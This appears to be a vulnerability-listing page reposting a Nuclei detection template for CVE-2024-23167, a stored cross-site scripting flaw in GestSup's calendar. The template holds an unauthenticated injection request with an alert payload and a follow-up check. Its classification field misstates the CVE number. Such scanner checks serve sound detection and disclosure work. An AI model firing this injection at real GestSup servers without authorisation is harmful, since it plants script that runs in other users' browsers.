CVE-2024-23167: GestSup - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: GestSup | POC: 已公开

漏洞描述

GestSup allows its users to add events to the calendar of all users. This is the HTTP request sent when a user adds an event to their calendar.

PoC代码[已公开]

id: CVE-2024-23167

info:
  name: GestSup - Cross-Site Scripting
  author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
  severity: high
  description: |
    GestSup allows its users to add events to the calendar of all users. This is the HTTP request sent when a user adds an event to their calendar.
  impact: |
    This vulnerability could allow unauthenticated attackers to compromise users accessing the Calendar feature of the application.
  remediation: |
    Apply security patches, validate and sanitize inputs to prevent XSS, and ensure proper authentication. Prevent JavaScript execution in the calendar.php file.
  reference:
    - https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23167
    - https://doc.gestsup.fr/install/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-231637
  metadata:
    max-request: 3
    vendor: gestsup
    product: gestsup
  tags: cve2024,cve,xss,gestsup

variables:
  formatted_date: "{{date_time('2006/01/02')}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /ajax/calendar.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        action=add_event&title=<img/src/onerror=alert(document.domain)>&start={{formatted_date}} 07:30:00&end={{formatted_date}} 23:00:00&allday=false&technician=1

    matchers:
      - type: word
        part: response
        words:
          - '{"event_id":"'
          - 'text/html'
        condition: and
        internal: true

  - raw:
      - |
        POST /index.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        login={{username}}&pass={{password}}&submit=submit

      - |
        GET /index.php?page=calendar HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'view=activity'
          - '?page=calendar'
          - '<img/src/onerror=alert(document.domain)>'
        condition: and

      - type: word
        part: header
        words:
          - text/html
# digest: 4a0a0047304502203e21190b9d4cec0f5916adc0717d424ccdeb513979d05710c448cd0eabb23c1d02210084c42767680f2ddce77a6e01a9d5c2f532c3d5991d027cc45b6cc79e3916ae6d:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-23167.yaml

相关漏洞推荐